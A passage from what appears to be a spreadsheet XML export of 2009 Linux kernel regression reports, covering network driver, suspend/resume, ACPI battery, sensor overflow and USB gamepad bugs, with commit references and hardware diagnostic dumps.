    <t>Subject : WOL with forcedeth broken since f55c21fd9a92a444e55ad1ca4e4732d56661bf2e Submitter : Philipp Matthias Hahn &lt;pmhahn@titan.lahn.de&gt; Date : 2009-01-29 6:31 References : http://marc.info/?l=linux-kernel&amp;m=123321232825316&amp;w=4 Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123330459229248&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline. Caused by: commit f55c21fd9a92a444e55ad1ca4e4732d56661bf2e Author: Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Date: Sat Sep 13 13:10:31 2008 -0700 forcedeth: call restore mac addr in nv_shutdown path Signed-off-by: Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Cc: Tobias Diedrich &lt;ranma+kernel@tdiedrich.de&gt; Cc: Ayaz Abdulla &lt;aabdulla@nvidia.com&gt; Cc: Jeff Garzik &lt;jeff@garzik.org&gt; Cc: "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: Jeff Garzik &lt;jgarzik@redhat.com&gt;</t>
  </si>
  <si>
    <t>boot hangs while bringing up gianfar ethernet</t>
  </si>
  <si>
    <t>commit 8c7396aebb68994c0519e438eecdf4d5fa9c7844</t>
  </si>
  <si>
    <t>2009-02-01 16:09 UTC</t>
  </si>
  <si>
    <t>2009-02-16 13:11 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG BISECTED] boot hangs while bringing up gianfar ethernet Submitter : Ira Snyder &lt;iws@ovro.caltech.edu&gt; Date : 2009-01-29 19:41 References : http://marc.info/?l=linux-kernel&amp;m=123325817201665&amp;w=4 Notify-Also : Peter Korsgaard &lt;jacmet@sunsite.dk&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hackbench [pthread mode] regression with 2.6.29-rc3</t>
  </si>
  <si>
    <t>2009-02-01 16:28 UTC</t>
  </si>
  <si>
    <t>2009-02-25 15:00 UTC</t>
  </si>
  <si>
    <t>Subject : hackbench [pthread mode] regression with 2.6.29-rc3 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2009-02-01 7:30 References : http://marc.info/?l=linux-kernel&amp;m=123347347726527&amp;w=4 Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 490dea45d00f01847ebebd007685d564aaf2cd98 Author: Peter Zijlstra &lt;peterz@infradead.org&gt; Date: Mon Nov 24 17:06:57 2008 +0100 itimers: remove the per-cpu-ish-ness Signed-off-by: Peter Zijlstra &lt;peterz@infradead.org&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 490dea45d00f01847ebebd007685d564aaf2cd98</t>
  </si>
  <si>
    <t>Resume broken on iBook</t>
  </si>
  <si>
    <t>2009-02-01 16:54 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.29-rc2 Earliest failing kernel version: 2.6.29-rc3 Distribution: Hardware Environment: iBook G4 Software Environment: Problem Description: Crash during resume from suspend to ram. Caused by: commit aa8c6c93747f7b55fa11e1624fec8ca33763a805 Author: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Date: Fri Jan 16 21:54:43 2009 +0100 PCI PM: Restore standard config registers of all devices early There is a problem in our handling of suspend-resume of PCI devices that many of them have their standard config registers restored with interrupts enabled and they are put into the full power state with interrupts enabled as well. This may lead to the following scenario: * an interrupt vector is shared between two or more devices * one device is resumed earlier and generates an interrupt * the interrupt handler of another device tries to handle it and attempts to access the device the config space of which hasn't been restored yet and/or which still is in a low power state * the system crashes as a result To prevent this from happening we should restore the standard configuration registers of all devices with interrupts disabled and we should put them into the D0 power state right after that. Unfortunately, this cannot be done using the existing pci_set_power_state(), because it can sleep. Also, to do it we have to make sure that the config spaces of all devices were actually saved during suspend.</t>
  </si>
  <si>
    <t>plymouth triggers circular locking warning on boot</t>
  </si>
  <si>
    <t>2009-02-03 10:23 UTC</t>
  </si>
  <si>
    <t>2009-02-16 08:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28 Earliest failing kernel version: Distribution: Fedora 10 Hardware Environment: lspci -vvv: 00:00.0 Host bridge: VIA Technologies, Inc. P4M266 Host Bridge Subsystem: VIA Technologies, Inc. Device 0000 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 8 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=256M] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x4 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: agpgart-via Kernel modules: via-agp 00:01.0 PCI bridge: VIA Technologies, Inc. VT8633 [Apollo Pro266 AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ INTx- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ded00000-deefffff Prefetchable memory behind bridge: ceb00000-debfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:09.0 VGA compatible controller: Oak Technology, Inc OTI-64111 [Spitfire] (rev 10) (prog-if 00 [VGA controller]) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 11 Region 0: Memory at dffff000 (32-bit, non-prefetchable) [disabled] [size=4K] Region 1: Memory at df000000 (32-bit, non-prefetchable) [disabled] [size=8M] Region 2: I/O ports at ec00 [disabled] [size=256] Expansion ROM at dffe0000 [disabled] [size=32K] 00:0b.0 Serial controller: Timedia Technology Co Ltd PCI2S550 (Dual 16550 UART) (rev 01) (prog-if 02 [16550]) Subsystem: Timedia Technology Co Ltd Device 5079 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at e800 [size=32] Region 2: I/O ports at e400 [size=8] Region 3: I/O ports at e000 [size=8] Kernel driver in use: serial Kernel modules: parport_pc 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 5 Region 4: I/O ports at d400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at d800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin C routed to IRQ 5 Region 4: I/O ports at dc00 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) (prog-if 20 [EHCI]) Subsystem: VIA Technologies, Inc. USB 2.0 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 128 bytes Interrupt: pin D routed to IRQ 11 Region 0: Memory at dfffef00 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge Subsystem: VIA Technologies, Inc. KT4AV motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel modules: via-ircc, i2c-viapro 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: VIA Technologies, Inc. VT82C586/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 Interrupt: pin A routed to IRQ 255 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [size=1] Region 4: I/O ports at fc00 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pata_via 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) Subsystem: VIA Technologies, Inc. K7VT2 motherboard Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 5 Region 0: I/O ports at d000 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: VIA 82xx Audio Kernel modules: snd-via82xx 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 74) Subsystem: VIA Technologies, Inc. VT6102 [Rhine II] Embeded Ethernet Controller on VT8235 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 (750ns min, 2000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 5 Region 0: I/O ports at cc00 [size=256] Region 1: Memory at dfffee00 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: via-rhine Kernel modules: via-rhine 01:00.0 VGA compatible controller: S3 Inc. VT8375 [ProSavage8 KM266/KL266] (prog-if 00 [VGA controller]) Subsystem: S3 Inc. VT8375 [ProSavage8 KM266/KL266] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 (1000ns min, 63750ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 5 Region 0: Memory at dee80000 (32-bit, non-prefetchable) [size=512K] Region 1: Memory at d0000000 (32-bit, prefetchable) [size=128M] Expansion ROM at dee70000 [disabled] [size=64K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [80] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x4 Command: RQ=32 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x4 Kernel modules: savagefb /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 1 model name : Intel(R) Pentium(R) 4 CPU 1.70GHz stepping : 2 cpu MHz : 1699.688 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pebs bts bogomips : 3399.37 clflush size : 64 power management: /proc/iomem: 00000000-0000ffff : reserved 00010000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cbfff : Video ROM 000f0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-1f7effff : System RAM 00400000-0067ebe4 : Kernel code 0067ebe5-007dc9e7 : Kernel data 00828000-00c2fd7b : Kernel bss 1f7f0000-1f7f7fff : ACPI Tables 1f7f8000-1f7fffff : ACPI Non-volatile Storage ceb00000-debfffff : PCI Bus 0000:01 d0000000-d7ffffff : 0000:01:00.0 d0000000-d06effff : vesafb ded00000-deefffff : PCI Bus 0000:01 dee70000-dee7ffff : 0000:01:00.0 dee80000-deefffff : 0000:01:00.0 df000000-df7fffff : 0000:00:09.0 dffe0000-dffe7fff : 0000:00:09.0 dfffee00-dfffeeff : 0000:00:12.0 dfffee00-dfffeeff : via-rhine dfffef00-dfffefff : 0000:00:10.3 dfffef00-dfffefff : ehci_hcd dffff000-dfffffff : 0000:00:09.0 e0000000-efffffff : 0000:00:00.0 fec00000-fec00fff : reserved fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved fff80000-ffffffff : reserved /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:11.1 0170-0177 : pata_via 01f0-01f7 : 0000:00:11.1 01f0-01f7 : pata_via 0201-0208 : ns558-pnp 0295-0296 : it87 0295-0296 : it87 0330-0331 : MPU401 UART 0376-0376 : 0000:00:11.1 0376-0376 : pata_via 0378-037a : parport0 03c0-03df : vesafb 03f2-03f5 : floppy 03f6-03f6 : 0000:00:11.1 03f6-03f6 : pata_via 03f7-03f7 : floppy DIR 03f8-03ff : serial 0400-040f : 0000:00:11.0 0400-0407 : vt596_smbus 0800-087f : 0000:00:11.0 0800-0803 : ACPI PM1a_EVT_BLK 0804-0805 : ACPI PM1a_CNT_BLK 0808-080b : ACPI PM_TMR 0810-0815 : ACPI CPU throttle 0820-0823 : ACPI GPE0_BLK 0cf8-0cff : PCI conf1 cc00-ccff : 0000:00:12.0 cc00-ccff : via-rhine d000-d0ff : 0000:00:11.5 d000-d0ff : VIA8233 d400-d41f : 0000:00:10.0 d400-d41f : uhci_hcd d800-d81f : 0000:00:10.1 d800-d81f : uhci_hcd dc00-dc1f : 0000:00:10.2 dc00-dc1f : uhci_hcd e000-e007 : 0000:00:0b.0 e400-e407 : 0000:00:0b.0 e400-e402 : parport1 e403-e407 : parport1 e800-e81f : 0000:00:0b.0 e800-e807 : serial e808-e80f : serial ec00-ecff : 0000:00:09.0 fc00-fc0f : 0000:00:11.1 fc00-fc0f : pata_via Software Environment: scripts/ver_linux: If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux karlalex.palosanto.com 2.6.29-rc3 #5 PREEMPT Mon Feb 2 00:16:29 ECT 2009 i686 i686 i386 GNU/Linux Gnu C 4.3.2 Gnu make 3.81 binutils 2.18.50.0.9 util-linux 2.14.1 mount support module-init-tools 3.5 e2fsprogs 1.41.3 pcmciautils 014 quota-tools 3.16. PPP 2.4.4 Linux C Library 2.9 Dynamic linker (ldd) 2.9 Procps 3.2.7 Net-tools 1.60 Kbd 1.12 oprofile 0.9.4 Sh-utils 6.12 udev 127 wireless-tools 29 Modules Loaded usb_storage ipv6 fuse savage drm sco bridge stp llc bnep l2cap bluetooth vboxnetflt vboxdrv it87 hwmon_vid hwmon vfat fat dm_multipath uinput ppdev snd_via82xx snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss i2c_viapro snd_mixer_oss floppy i2c_core snd_pcm sr_mod pcspkr via_ircc via_rhine snd_timer cdrom mii snd_page_alloc irda crc_ccitt snd_mpu401 snd_mpu401_uart snd_rawmidi snd_seq_device snd ns558 parport_pc gameport soundcore parport via_agp uhci_hcd ohci_hcd ehci_hcd usbcore Problem Description: On boot, I get the following in dmesg and the console output: INFO: possible circular locking dependency detected Boot still runs to completion and machine still appears responsive, so this is low priority. But this might point to a more subtle problem. Steps to reproduce: Compile 2.6.29-rc3 with fedora 10 and lock checking Boot with vga=0x317 for vesafb</t>
  </si>
  <si>
    <t>Video(DRI - Intel)</t>
  </si>
  <si>
    <t>drivers_video-dri-intel@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>don't assume we are fully charged when not charging or discharging</t>
  </si>
  <si>
    <t>2009-02-04 05:53 UTC</t>
  </si>
  <si>
    <t>2009-02-22 17:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: Everything since ACPI moved to using the power_supply class Distribution: Fedora rawhide Hardware Environment: Lenovo T61 Software Environment: Fedora rawhide Problem Description: On hardware like the T61 it can take a couple of seconds for the battery to start charging after the power is connected, and we incorrectly tell userspace that we are fully charged, and then go back to charging. Only mark a battery as fully charged when the preset charge matches either the last full charge, or the design charge. Steps to reproduce: Charge battery to 50%. Watch /sys/class/power_supply/BAT*/status, and observe that when the power is disconnected, the status goes from charging-&gt;fully_charged-&gt;discharging. This also happens when going from battery to AC. This greatly confuses userspace.</t>
  </si>
  <si>
    <t>Adam Pigg</t>
  </si>
  <si>
    <t>DMI low-memory-protect quirk causes resume hang on Samsung NC10</t>
  </si>
  <si>
    <t>2.6.27.7</t>
  </si>
  <si>
    <t>2009-02-06 18:35 UTC</t>
  </si>
  <si>
    <t>Patrick Walton</t>
  </si>
  <si>
    <t>2011-07-30 05:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.2 Earliest failing kernel version: 2.6.28.3 Distribution: Arch Linux, all problems reproduced using a mainline kernel Hardware Environment: Samsung NC10 Netbook, purchased 02/2009 Software Environment: Linux, latest BIOS, triggered suspend in early userspace before modules are loaded Problem Description: The kernel hangs before the video is turned on (but after the kernel takes control) when resuming from suspend. Using pm_trace produces nothing useful, because the RTC does not get updated at all. Steps to reproduce: Suspend at any time by using pm-suspend or echo mem. The HDD light will blink when resuming, indicating that the kernel has control, but it will hang.</t>
  </si>
  <si>
    <t>w1_therm overflows for temperatures greater that 32.767 Celsius</t>
  </si>
  <si>
    <t>2009-02-07 04:53 UTC</t>
  </si>
  <si>
    <t>2012-05-30 12:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:Unknown Earliest failing kernel version:2.6.29-rc3 Distribution:FC-8 Hardware Environment:i386, DS18B20 slave, DS9490R master. Software Environment: Problem Description:When the temperature exceeds 32767 milli-degrees the temperature overflows to -32768 millidegrees. These are bothe well within the -55 - +125 degree range for the sensor. Steps to reproduce: Put your thumb on the sensor while periodically inspecting /sys/devices/w1\ bus\ master/*/w1_slave</t>
  </si>
  <si>
    <t>Regression on VIA C3 motherboard, commit: 66f2173e2</t>
  </si>
  <si>
    <t>commit 7b37b5fd9ba32c0c5afc3537eed7e7466f2173e2</t>
  </si>
  <si>
    <t>2009-02-07 06:18 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:10 UTC</t>
  </si>
  <si>
    <t>Subject : Regression on VIA C3 motherboard, commit: 66f2173e2 Submitter : Ben Greear &lt;greearb@candelatech.com&gt; Date : 2009-02-05 7:23 References : http://marc.info/?l=linux-kernel&amp;m=123382154605722&amp;w=4 Handled-By : Len Brown &lt;lenb@kernel.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123394675605107&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 7b37b5fd9ba32c0c5afc3537eed7e7466f2173e2 Author: Len Brown &lt;len.brown@intel.com&gt; Date: Tue Dec 23 01:47:42 2008 -0500 ACPI: disable MPS when NO APIC-table found Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; First-Bad-Commit : 7b37b5fd9ba32c0c5afc3537eed7e7466f2173e2</t>
  </si>
  <si>
    <t>Early crash with 2.6.29-rc3</t>
  </si>
  <si>
    <t>2009-02-07 06:33 UTC</t>
  </si>
  <si>
    <t>2009-02-12 00:00 UTC</t>
  </si>
  <si>
    <t>Subject : Early crash with 2.6.29-rc3 Submitter : Andrew McMillan &lt;andrew@morphoss.com&gt; Date : 2009-02-04 20:03 References : http://marc.info/?l=linux-kernel&amp;m=123377840816097&amp;w=4 Handled-By : Len Brown &lt;lenb@kernel.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Strange load average and ksoftirqd behavior with 2.6.29-rc2-git1</t>
  </si>
  <si>
    <t>2.6.29-rc2-git1</t>
  </si>
  <si>
    <t>2009-02-07 06:45 UTC</t>
  </si>
  <si>
    <t>2009-02-23 14:38 UTC</t>
  </si>
  <si>
    <t>Subject : Strange load average and ksoftirqd behavior with 2.6.29-rc2-git1 Submitter : Damien Wyart &lt;damien.wyart@free.fr&gt; Date : 2009-01-20 16:25 References : http://marc.info/?l=linux-kernel&amp;m=123246937207675&amp;w=2 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwl3945 broken after hibernation: Wait for START_ALIVE timeout after 2000ms.</t>
  </si>
  <si>
    <t>v2.6.29-rc3-742-ge83102c</t>
  </si>
  <si>
    <t>2009-02-08 01:52 UTC</t>
  </si>
  <si>
    <t>2009-02-13 13:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.28, but may be even some previous -rcs worked (not sure) Earliest failing kernel version: v2.6.29-rc3-742-ge83102c Distribution: Ubuntu 8.10 Hardware Environment: Dell XPS M1330 (64bit) Software Environment: iwlwifi-3945-2.ucode (firmware version 15.28.2.8) Problem Description: After resuming from hybernation the network card is disabled (the activity LED is off) and these messages can appear in kernel log: iwl3945 0000:0c:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 iwl3945 0000:0c:00.0: irq 30 for MSI/MSI-X iwl3945: Wait for START_ALIVE timeout after 2000ms. iwl3945 0000:0c:00.0: PCI INT A disabled iwl3945 0000:0c:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 iwl3945 0000:0c:00.0: irq 30 for MSI/MSI-X iwl3945: Wait for START_ALIVE timeout after 2000ms. iwl3945 0000:0c:00.0: PCI INT A disabled Switching the card on and off with killswitch (the laptop has a hardware killswitch) does not help. Steps to reproduce: hybernate and resume</t>
  </si>
  <si>
    <t>ThrustMaster Firestorm Dual Power 3 Gamepads stopped working</t>
  </si>
  <si>
    <t>2.6.28.4</t>
  </si>
  <si>
    <t>2009-02-08 08:45 UTC</t>
  </si>
  <si>
    <t>Frank Roscher</t>
  </si>
  <si>
    <t>2009-02-16 06:28 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.15 Earliest failing kernel version: 2.6.28 Distribution: ArchLinux Problem Description: From version 2.6.28 on no device file is created anymore for this gamepad - rendering it useless. Latest tested version is 2.6.29-rc3-git12. A quick web search shows some people on Ubuntu and one other ArchLinux user having the same problem with this specific gamepad. Additional dmesg output after plugging out and plugging in again: usb 2-1: USB disconnect, address 2 usb 2-1: new low speed USB device using uhci_hcd and address 3 usb 2-1: configuration #1 chosen from 1 choice Output of lsusb -v for the device on an affected kernel: Bus 002 Device 002: ID 044f:b304 ThrustMaster, Inc. Firestorm Dual Power Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x044f ThrustMaster, Inc. idProduct 0xb304 Firestorm Dual Power bcdDevice 1.00 iManufacturer 4 THRUSTMASTER iProduct 30 FireStorm Dual Power 2 iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 34 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xa0 (Bus Powered) Remote Wakeup MaxPower 400mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 0 No Subclass bInterfaceProtocol 0 None iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 33 US bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 108 Report Descriptor: (length is 108) Item(Global): Usage Page, data= [ 0x01 ] 1 Generic Desktop Controls Item(Local ): Usage, data= [ 0x05 